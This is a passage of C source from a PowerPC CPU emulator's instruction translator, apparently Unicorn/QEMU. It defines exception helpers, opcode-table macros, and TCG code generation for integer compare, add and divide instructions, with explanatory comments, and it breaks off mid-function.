*/ static uint32_t gen_prep_dbgex(DisasContext *ctx) { if (ctx->flags & POWERPC_FLAG_DE) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong dbsr = 0; if (ctx->singlestep_enabled & CPU_SINGLE_STEP) { dbsr = DBCR0_ICMP; } else { /* Must have been branch */ dbsr = DBCR0_BRT; } TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, SPR_BOOKE_DBSR); tcg_gen_ori_tl(tcg_ctx, t0, t0, dbsr); gen_store_spr(tcg_ctx, SPR_BOOKE_DBSR, t0); tcg_temp_free(tcg_ctx, t0); return POWERPC_EXCP_DEBUG; } else { return POWERPC_EXCP_TRACE; } } static void gen_debug_exception(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if ((ctx->exception != POWERPC_EXCP_BRANCH) && (ctx->exception != POWERPC_EXCP_SYNC)) { gen_update_nip(ctx, ctx->base.pc_next); } t0 = tcg_const_i32(tcg_ctx, EXCP_DEBUG); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_inval_exception(DisasContext *ctx, uint32_t error) { /* Will be converted to program check if needed */ gen_exception_err(ctx, POWERPC_EXCP_HV_EMU, POWERPC_EXCP_INVAL | error); } static inline void gen_priv_exception(DisasContext *ctx, uint32_t error) { gen_exception_err(ctx, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_PRIV | error); } static inline void gen_hvpriv_exception(DisasContext *ctx, uint32_t error) { /* Will be converted to program check if needed */ gen_exception_err(ctx, POWERPC_EXCP_HV_EMU, POWERPC_EXCP_PRIV | error); } /* Stop translation */ static inline void gen_stop_exception(DisasContext *ctx) { gen_update_nip(ctx, ctx->base.pc_next); ctx->exception = POWERPC_EXCP_STOP; } /* No need to update nip here, as execution flow will change */ static inline void gen_sync_exception(DisasContext *ctx) { ctx->exception = POWERPC_EXCP_SYNC; } #define GEN_HANDLER(name, opc1, opc2, opc3, inval, type) \ GEN_OPCODE(name, opc1, opc2, opc3, inval, type, PPC_NONE) #define GEN_HANDLER_E(name, opc1, opc2, opc3, inval, type, type2) \ GEN_OPCODE(name, opc1, opc2, opc3, inval, type, type2) #define GEN_HANDLER2(name, onam, opc1, opc2, opc3, inval, type) \ GEN_OPCODE2(name, onam, opc1, opc2, opc3, inval, type, PPC_NONE) #define GEN_HANDLER2_E(name, onam, opc1, opc2, opc3, inval, type, type2) \ GEN_OPCODE2(name, onam, opc1, opc2, opc3, inval, type, type2) #define GEN_HANDLER_E_2(name, opc1, opc2, opc3, opc4, inval, type, type2) \ GEN_OPCODE3(name, opc1, opc2, opc3, opc4, inval, type, type2) #define GEN_HANDLER2_E_2(name, onam, opc1, opc2, opc3, opc4, inval, typ, typ2) \ GEN_OPCODE4(name, onam, opc1, opc2, opc3, opc4, inval, typ, typ2) typedef struct opcode_t { unsigned char opc1, opc2, opc3, opc4; #if HOST_LONG_BITS == 64 /* Explicitly align to 64 bits */ unsigned char pad[4]; #endif opc_handler_t handler; const char *oname; } opcode_t; /* Helpers for priv. 
check */ #define GEN_PRIV \ do { \ gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; \ } while (0) #define CHK_HV \ do { \ if (unlikely(ctx->pr || !ctx->hv)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_SV \ do { \ if (unlikely(ctx->pr)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_HVRM \ do { \ if (unlikely(ctx->pr || !ctx->hv || ctx->dr)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_NONE /*****************************************************************************/ /* PowerPC instructions table */ #if defined(DO_PPC_STATISTICS) #define GEN_OPCODE(name, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE_DUAL(name, op1, op2, op3, invl1, invl2, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl1, \ .inval2 = invl2, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE2(name, onam, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = onam, \ }, \ .oname = onam, \ } #define GEN_OPCODE3(name, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE4(name, onam, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = onam, \ }, \ .oname = onam, \ } #else #define GEN_OPCODE(name, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE_DUAL(name, op1, op2, op3, invl1, invl2, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl1, \ .inval2 = invl2, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE2(name, onam, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = onam, \ } #define GEN_OPCODE3(name, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE4(name, onam, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = onam, \ } #endif /* Invalid instruction */ static void gen_invalid(DisasContext *ctx) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } static opc_handler_t invalid_handler = { .inval1 = 0xFFFFFFFF, .inval2 = 0xFFFFFFFF, .type = PPC_NONE, .type2 = PPC_NONE, .handler = gen_invalid, }; 
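/*
 * Illustrative sketch (opcode values are hypothetical, not taken from the
 * dispatch table): a handler such as gen_cmp would be registered with
 *
 *     GEN_HANDLER(cmp, 0x1F, 0x00, 0x00, 0x00400000, PPC_INTEGER)
 *
 * which, with DO_PPC_STATISTICS disabled, expands to the opcode_t
 * initializer
 *
 *     {
 *         .opc1 = 0x1F, .opc2 = 0x00, .opc3 = 0x00, .opc4 = 0xff,
 *         .handler = {
 *             .inval1 = 0x00400000,
 *             .type = PPC_INTEGER,
 *             .type2 = PPC_NONE,
 *             .handler = &gen_cmp,
 *         },
 *         .oname = "cmp",
 *     }
 *
 * The translator decodes opc1/opc2/opc3 (and opc4 for some extended forms)
 * from each instruction word, looks up the matching opcode_t, rejects
 * encodings whose reserved bits collide with the inval1/inval2 masks, and
 * finally calls handler.handler(ctx).
 */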
/*** Integer comparison ***/

static inline void gen_op_cmp(TCGContext *tcg_ctx, TCGv arg0, TCGv arg1,
                              int s, int crf)
{
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);
    TCGv_i32 t = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_movi_tl(tcg_ctx, t0, CRF_EQ);
    tcg_gen_movi_tl(tcg_ctx, t1, CRF_LT);
    tcg_gen_movcond_tl(tcg_ctx, (s ? TCG_COND_LT : TCG_COND_LTU),
                       t0, arg0, arg1, t1, t0);
    tcg_gen_movi_tl(tcg_ctx, t1, CRF_GT);
    tcg_gen_movcond_tl(tcg_ctx, (s ? TCG_COND_GT : TCG_COND_GTU),
                       t0, arg0, arg1, t1, t0);

    tcg_gen_trunc_tl_i32(tcg_ctx, t, t0);
    tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[crf], cpu_so);
    tcg_gen_or_i32(tcg_ctx, cpu_crf[crf], cpu_crf[crf], t);

    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free_i32(tcg_ctx, t);
}

static inline void gen_op_cmpi(TCGContext *tcg_ctx, TCGv arg0,
                               target_ulong arg1, int s, int crf)
{
    TCGv t0 = tcg_const_tl(tcg_ctx, arg1);

    gen_op_cmp(tcg_ctx, arg0, t0, s, crf);
    tcg_temp_free(tcg_ctx, t0);
}

static inline void gen_op_cmp32(TCGContext *tcg_ctx, TCGv arg0, TCGv arg1,
                                int s, int crf)
{
    TCGv t0, t1;

    t0 = tcg_temp_new(tcg_ctx);
    t1 = tcg_temp_new(tcg_ctx);
    if (s) {
        tcg_gen_ext32s_tl(tcg_ctx, t0, arg0);
        tcg_gen_ext32s_tl(tcg_ctx, t1, arg1);
    } else {
        tcg_gen_ext32u_tl(tcg_ctx, t0, arg0);
        tcg_gen_ext32u_tl(tcg_ctx, t1, arg1);
    }
    gen_op_cmp(tcg_ctx, t0, t1, s, crf);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t0);
}

static inline void gen_op_cmpi32(TCGContext *tcg_ctx, TCGv arg0,
                                 target_ulong arg1, int s, int crf)
{
    TCGv t0 = tcg_const_tl(tcg_ctx, arg1);

    gen_op_cmp32(tcg_ctx, arg0, t0, s, crf);
    tcg_temp_free(tcg_ctx, t0);
}

static inline void gen_set_Rc0(DisasContext *ctx, TCGv reg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (NARROW_MODE(ctx)) {
        gen_op_cmpi32(tcg_ctx, reg, 0, 1, 0);
    } else {
        gen_op_cmpi(tcg_ctx, reg, 0, 1, 0);
    }
}

/* cmp */
static void gen_cmp(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) {
        gen_op_cmp(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)],
                   1, crfD(ctx->opcode));
    } else {
        gen_op_cmp32(tcg_ctx, cpu_gpr[rA(ctx->opcode)],
                     cpu_gpr[rB(ctx->opcode)], 1, crfD(ctx->opcode));
    }
}

/* cmpi */
static void gen_cmpi(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) {
        gen_op_cmpi(tcg_ctx, cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode),
                    1, crfD(ctx->opcode));
    } else {
        gen_op_cmpi32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode),
                      1, crfD(ctx->opcode));
    }
}

/* cmpl */
static void gen_cmpl(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) {
        gen_op_cmp(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)],
                   0, crfD(ctx->opcode));
    } else {
        gen_op_cmp32(tcg_ctx, cpu_gpr[rA(ctx->opcode)],
                     cpu_gpr[rB(ctx->opcode)], 0, crfD(ctx->opcode));
    }
}

/* cmpli */
static void gen_cmpli(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) {
        gen_op_cmpi(tcg_ctx, cpu_gpr[rA(ctx->opcode)], UIMM(ctx->opcode),
                    0, crfD(ctx->opcode));
    } else {
        gen_op_cmpi32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], UIMM(ctx->opcode),
                      0, crfD(ctx->opcode));
    }
}
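/*
 * Worked example (illustrative sketch): gen_op_cmp() above leaves exactly
 * one of CRF_LT, CRF_GT or CRF_EQ in the target CR field and ORs in the
 * sticky summary-overflow bit. For a signed compare of arg0 = -3 against
 * arg1 = 7 into crf = 0, the generated code behaves as:
 *
 *     t0 = CRF_EQ
 *     t0 = (-3 <  7) ? CRF_LT : t0      ->  t0 = CRF_LT
 *     t0 = (-3 >  7) ? CRF_GT : t0      ->  t0 unchanged
 *     cpu_crf[0] = t0 | cpu_so
 *
 * so CR0 reads "less than" (plus SO), which is what a following conditional
 * branch on CR0 tests.
 */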
/* cmprb - range comparison: isupper, isalpha, islower */
static void gen_cmprb(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 src1 = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 src2 = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 src2lo = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 src2hi = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 crf = cpu_crf[crfD(ctx->opcode)];

    tcg_gen_trunc_tl_i32(tcg_ctx, src1, cpu_gpr[rA(ctx->opcode)]);
    tcg_gen_trunc_tl_i32(tcg_ctx, src2, cpu_gpr[rB(ctx->opcode)]);

    tcg_gen_andi_i32(tcg_ctx, src1, src1, 0xFF);
    tcg_gen_ext8u_i32(tcg_ctx, src2lo, src2);
    tcg_gen_shri_i32(tcg_ctx, src2, src2, 8);
    tcg_gen_ext8u_i32(tcg_ctx, src2hi, src2);

    tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2lo, src2lo, src1);
    tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2hi, src1, src2hi);
    tcg_gen_and_i32(tcg_ctx, crf, src2lo, src2hi);

    if (ctx->opcode & 0x00200000) {
        tcg_gen_shri_i32(tcg_ctx, src2, src2, 8);
        tcg_gen_ext8u_i32(tcg_ctx, src2lo, src2);
        tcg_gen_shri_i32(tcg_ctx, src2, src2, 8);
        tcg_gen_ext8u_i32(tcg_ctx, src2hi, src2);
        tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2lo, src2lo, src1);
        tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2hi, src1, src2hi);
        tcg_gen_and_i32(tcg_ctx, src2lo, src2lo, src2hi);
        tcg_gen_or_i32(tcg_ctx, crf, crf, src2lo);
    }
    tcg_gen_shli_i32(tcg_ctx, crf, crf, CRF_GT_BIT);
    tcg_temp_free_i32(tcg_ctx, src1);
    tcg_temp_free_i32(tcg_ctx, src2);
    tcg_temp_free_i32(tcg_ctx, src2lo);
    tcg_temp_free_i32(tcg_ctx, src2hi);
}

#if defined(TARGET_PPC64)
/* cmpeqb */
static void gen_cmpeqb(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_cmpeqb(tcg_ctx, cpu_crf[crfD(ctx->opcode)],
                      cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]);
}
#endif

/* isel (PowerPC 2.03 specification) */
static void gen_isel(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    uint32_t bi = rC(ctx->opcode);
    uint32_t mask = 0x08 >> (bi & 0x03);
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv zr;

    tcg_gen_extu_i32_tl(tcg_ctx, t0, cpu_crf[bi >> 2]);
    tcg_gen_andi_tl(tcg_ctx, t0, t0, mask);

    zr = tcg_const_tl(tcg_ctx, 0);
    tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_gpr[rD(ctx->opcode)], t0, zr,
                       rA(ctx->opcode) ?
cpu_gpr[rA(ctx->opcode)] : zr, cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, zr); tcg_temp_free(tcg_ctx, t0); } /* cmpb: PowerPC 2.05 specification */ static void gen_cmpb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_cmpb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } /*** Integer arithmetic ***/ static inline void gen_op_arith_compute_ov(DisasContext *ctx, TCGv arg0, TCGv arg1, TCGv arg2, int sub) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_xor_tl(tcg_ctx, cpu_ov, arg0, arg2); tcg_gen_xor_tl(tcg_ctx, t0, arg1, arg2); if (sub) { tcg_gen_and_tl(tcg_ctx, cpu_ov, cpu_ov, t0); } else { tcg_gen_andc_tl(tcg_ctx, cpu_ov, cpu_ov, t0); } tcg_temp_free(tcg_ctx, t0); if (NARROW_MODE(ctx)) { tcg_gen_extract_tl(tcg_ctx, cpu_ov, cpu_ov, 31, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } } else { if (is_isa300(ctx)) { tcg_gen_extract_tl(tcg_ctx, cpu_ov32, cpu_ov, 31, 1); } tcg_gen_extract_tl(tcg_ctx, cpu_ov, cpu_ov, TARGET_LONG_BITS - 1, 1); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } static inline void gen_op_arith_compute_ca32(DisasContext *ctx, TCGv res, TCGv arg0, TCGv arg1, TCGv ca32, int sub) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (!is_isa300(ctx)) { return; } t0 = tcg_temp_new(tcg_ctx); if (sub) { tcg_gen_eqv_tl(tcg_ctx, t0, arg0, arg1); } else { tcg_gen_xor_tl(tcg_ctx, t0, arg0, arg1); } tcg_gen_xor_tl(tcg_ctx, t0, t0, res); tcg_gen_extract_tl(tcg_ctx, ca32, t0, 32, 1); tcg_temp_free(tcg_ctx, t0); } /* Common add function */ static inline void gen_op_arith_add(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv ca, TCGv ca32, bool add_ca, bool compute_ca, bool compute_ov, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = ret; if (compute_ca || compute_ov) { t0 = tcg_temp_new(tcg_ctx); } if (compute_ca) { if (NARROW_MODE(ctx)) { /* * Caution: a non-obvious corner case of the spec is that * we must produce the *entire* 64-bit addition, but * produce the carry into bit 32. 
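 *
 * A worked sketch of the trick (plain C, illustrative only): for
 * 64-bit values a and b,
 *
 *     uint64_t sum = a + b;                      full-width addition
 *     uint64_t ca  = ((a ^ b ^ sum) >> 32) & 1;  carry into bit 32
 *
 * a ^ b is the no-carry sum of each bit pair, so XORing it with the
 * real sum isolates exactly the bits flipped by carry propagation;
 * bit 32 of that value is the carry out of the low word.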
*/ TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_xor_tl(tcg_ctx, t1, arg1, arg2); /* add without carry */ tcg_gen_add_tl(tcg_ctx, t0, arg1, arg2); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, t0, ca); } tcg_gen_xor_tl(tcg_ctx, ca, t0, t1); /* bits changed w/ carry */ tcg_temp_free(tcg_ctx, t1); tcg_gen_extract_tl(tcg_ctx, ca, ca, 32, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, ca32, ca); } } else { TCGv zero = tcg_const_tl(tcg_ctx, 0); if (add_ca) { tcg_gen_add2_tl(tcg_ctx, t0, ca, arg1, zero, ca, zero); tcg_gen_add2_tl(tcg_ctx, t0, ca, t0, ca, arg2, zero); } else { tcg_gen_add2_tl(tcg_ctx, t0, ca, arg1, zero, arg2, zero); } gen_op_arith_compute_ca32(ctx, t0, arg1, arg2, ca32, 0); tcg_temp_free(tcg_ctx, zero); } } else { tcg_gen_add_tl(tcg_ctx, t0, arg1, arg2); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, t0, ca); } } if (compute_ov) { gen_op_arith_compute_ov(ctx, t0, arg1, arg2, 0); } if (unlikely(compute_rc0)) { gen_set_Rc0(ctx, t0); } if (t0 != ret) { tcg_gen_mov_tl(tcg_ctx, ret, t0); tcg_temp_free(tcg_ctx, t0); } } /* Add functions with two operands */ #define GEN_INT_ARITH_ADD(name, opc3, ca, add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ ca, glue(ca, 32), \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ } /* Add functions with one operand and one immediate */ #define GEN_INT_ARITH_ADD_CONST(name, opc3, const_val, ca, \ add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0 = tcg_const_tl(tcg_ctx, const_val); \ gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], t0, \ ca, glue(ca, 32), \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ tcg_temp_free(tcg_ctx, t0); \ } /* add add. addo addo. */ GEN_INT_ARITH_ADD(add, 0x08, cpu_ca, 0, 0, 0) GEN_INT_ARITH_ADD(addo, 0x18, cpu_ca, 0, 0, 1) /* addc addc. addco addco. */ GEN_INT_ARITH_ADD(addc, 0x00, cpu_ca, 0, 1, 0) GEN_INT_ARITH_ADD(addco, 0x10, cpu_ca, 0, 1, 1) /* adde adde. addeo addeo. */ GEN_INT_ARITH_ADD(adde, 0x04, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD(addeo, 0x14, cpu_ca, 1, 1, 1) /* addme addme. addmeo addmeo. */ GEN_INT_ARITH_ADD_CONST(addme, 0x07, -1LL, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addmeo, 0x17, -1LL, cpu_ca, 1, 1, 1) /* addex */ GEN_INT_ARITH_ADD(addex, 0x05, cpu_ov, 1, 1, 0); /* addze addze. 
addzeo addzeo.*/ GEN_INT_ARITH_ADD_CONST(addze, 0x06, 0, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addzeo, 0x16, 0, cpu_ca, 1, 1, 1) /* addi */ static void gen_addi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); if (rA(ctx->opcode) == 0) { /* li case */ tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm); } else { tcg_gen_addi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], simm); } } /* addic addic.*/ static inline void gen_op_addic(DisasContext *ctx, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv c = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], c, cpu_ca, cpu_ca32, 0, 1, 0, compute_rc0); tcg_temp_free(tcg_ctx, c); } static void gen_addic(DisasContext *ctx) { gen_op_addic(ctx, 0); } static void gen_addic_(DisasContext *ctx) { gen_op_addic(ctx, 1); } /* addis */ static void gen_addis(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); if (rA(ctx->opcode) == 0) { /* lis case */ tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm << 16); } else { tcg_gen_addi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], simm << 16); } } /* addpcis */ static void gen_addpcis(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long d = DX(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], ctx->base.pc_next + (d << 16)); } static inline void gen_op_arith_divw(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign, int compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, arg2); if (sign) { tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i32(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i32(tcg_ctx, t2, t2, t3); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); } else { tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t1, 0); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_divu_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); } if (compute_ov) { tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov, t2); if (is_isa300(ctx)) { tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov32, t2); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, ret); } } /* Div functions */ #define GEN_INT_ARITH_DIVW(name, opc3, sign, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_divw(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign, compute_ov); \ } /* divwu divwu. divwuo divwuo. */ GEN_INT_ARITH_DIVW(divwu, 0x0E, 0, 0); GEN_INT_ARITH_DIVW(divwuo, 0x1E, 0, 1); /* divw divw. divwo divwo. */ GEN_INT_ARITH_DIVW(divw, 0x0F, 1, 0); GEN_INT_ARITH_DIVW(divwo, 0x1F, 1, 1); /* div[wd]eu[o][.] 
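   Note: the GEN_DIVE wrapper below routes the plain and the
   overflow-recording (o) forms through a single helper, passing
   compute_ov as a constant i32; e.g. divweu and divweuo both call
   gen_helper_divweu and differ only in that constant.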
*/ #define GEN_DIVE(name, hlpr, compute_ov) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0 = tcg_const_i32(tcg_ctx, compute_ov); \ gen_helper_##hlpr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); \ } \ } GEN_DIVE(divweu, divweu, 0); GEN_DIVE(divweuo, divweu, 1); GEN_DIVE(divwe, divwe, 0); GEN_DIVE(divweo, divwe, 1); #if defined(TARGET_PPC64) static inline void gen_op_arith_divd(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign, int compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, arg1); tcg_gen_mov_i64(tcg_ctx, t1, arg2); if (sign) { tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t0, INT64_MIN); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i64(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); 